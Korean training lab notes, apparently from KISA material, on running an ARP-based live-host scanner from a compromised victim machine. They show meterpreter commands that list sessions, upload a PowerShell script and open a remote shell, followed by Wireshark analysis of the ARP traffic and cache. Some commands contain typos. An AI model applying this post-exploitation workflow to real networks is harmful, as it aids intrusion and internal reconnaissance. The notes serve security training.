[인프라와 웹의 위협기술]4. ARP 기반 라이브 호스트 스캐닝 실습 - 파워쉘 스크립트 활용

학습 목표

• ARP를 활용한 라이브 호스트 스캐닝 도구의 동작방식 이해

주요 내용

• 파워쉘 스크립트로 구현된 ARP기반 라이브 호스트 스캐닝 도구 사용하기
• 스캐닝 도구의 핵심 스크립트 코드 분석하기
• ARP기반 라이브 호스트 스캐닝 도구의 네트워크 트래픽 분석하기

실습 내용

1.  사용자 단말(Victim) 시스템을 대상으로 스캐닝 기능을 가진 파워쉘 스크립트 파일을 업로드합니다.

2. 사용자 단말(Victim)에서 원격 쉘을 이용하여 라이브 호스트 스캐닝 기능을 갖고 있는 파워쉘 스크립트를 실행합니다.

3. 사용자 단말(Victim)에서 패킷 분석 도구를 이용하여 ARP 요청 및 응답 패킷을 분석합니다.

4. 사용자 단말(ictim)에서 ARP캐시 테이블을 조사하여 갱신된 호스트 정보를 확인합니다.

STEP1. 라이브 호스트 스캐닝에 사용할 파워렛 스크립트 업로드

msf exploit(handler> > sessions -l
//현재 세션 연결이 되어 있는 공격대상 시스템들을 나열함

msf exploit(handler) > session -i
//1번 세션에 연결된 공격대상 시스템의 세션으로 진입함


msterpreter > upload /root/PostExploitation/Scan-LiveHosts.ps1 c:\\lab\\Scan-LiveHosts.ps1
//공격대상 시스템으로 라이브호스트 스캐닝 스크립트를 업로드 함

파워쉘 스크립트(.ps1, 숫자 1입니다)

STEP2. 도구의 업로드 성공여부 확인

meterpreter > shell
//윈도우 명령쉘 프로그램 실행

C:\Winodws\system32\> dir c:\lab /w/a
//목표 디렉토리에 스캐닝 스크립트가 제대로 업로드 되었는지 확인

STEP3.분석을 위한 패킷 분석도구 실행

 

모니터링할 NIC 선택

STEP4.패킷 분석도구의 디스플레이 필터 적용

• 패킷분석도구(Wireshark)에서 실시간으로 캡처되는 패킷이 많으므로 디스플레이 필터를 적용하여 패킷만 보여지도록 조취합니다.
• 디스플레이 필터에 "arp"문자열을 입력하여 필터를 적용합니다.

STEP5.라이브 호스트 스캐닝 스크립트 실행

• 라이브 호스트 스캐닝 도구를 실행합니다.
• 네트워크 전체를 스캐닝하면 오래 걸릴 수 있으므로 스캐닝 범위를 일부로 제한합니다.
• 스캐닝 결과 4개의 호스트가 발견되었습니다.

C:\Windows\System32\> powershell
PS C:\Windows\System32\> c:\lab\Scan-LiveHosts.ps1 -NetworkRange "192.168.10.1-50"

사용하고 있는 IP주소(자기자신)을 제외한 주소가 호스트 안에 살아있다.

STEP6. 패킷 분석

• 공격대상 시스템에서 라이브 호스트 스캐닝이 수행되는 동안 수많은 ARP 요청 패킷이 발생 되었음을 알 수 있습니다.
• ARP 응답 패킷을 별도로 디스플레이 필터를 통해 확인하면 스캐닝된 호스트들의 응답 패킷이 관찰됩니다.
• ARP 응답 패킷에 의해 시스템은 ARP 캐시테이블의 내용을 갱신하게 됩니다.

스크립트에 의해 다수의 ARP요청이 발생

arp.cpcode == 2를 하면 ARP 응답 패킷만 볼 수 있도록 디스플레이 필터 적용

 

ARP패킷 = Who has

is at = 응답이 온다/살아있는 패킷

STE7.ARP 캐시 테이블 분석

• 공격대상 시스템은 원격 호스트들의 ARP 응답 패킷으로 인해 ARP 캐시 테이블에 관련 정보들이 갱신되었음을 알 수 있습니다.
• 해당 캐시테이블은 도구에 의해 파싱되며, 사용자가 스크립트의 파라미터로 지정한 스캐닝 주소 범위에 해당하는 목록만 별도로 추출되어 사용자에게 출력됩니다.

 

출처: KISA 정보보호제품군 실습 훈련 기초2